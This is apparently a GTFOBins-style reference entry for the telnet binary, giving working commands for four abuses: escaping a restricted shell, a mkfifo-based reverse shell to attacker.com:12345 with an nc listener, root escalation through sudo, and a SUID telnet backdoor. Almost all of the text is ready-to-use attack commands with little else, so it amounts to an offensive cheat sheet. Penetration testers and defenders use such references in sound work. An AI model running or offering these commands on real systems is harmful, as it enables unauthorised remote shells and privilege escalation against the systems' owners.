It can be used to break out from restricted environments by spawning an interactive system shell.
BSD version only. Needs to be connected first.
RHOST=attacker.com
RPORT=12345
telnet $RHOST $RPORT
^]
!/bin/shIt can send back a reverse shell to a listening attacker to open a remote network access.
Run nc -l -p 12345 on the attacker box to receive the shell.
RHOST=attacker.com
RPORT=12345
TF=$(mktemp -u)
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TFIt runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
BSD version only. Needs to be connected first.
RHOST=attacker.com
RPORT=12345
sudo telnet $RHOST $RPORT
^]
!/bin/shIt runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run commands it only works on systems
like Debian that allow the default sh shell to run with SUID privileges.
BSD version only. Needs to be connected first.
sudo sh -c 'cp $(which telnet) .; chmod +s ./telnet'
RHOST=attacker.com
RPORT=12345
./telnet $RHOST $RPORT
^]
!/bin/sh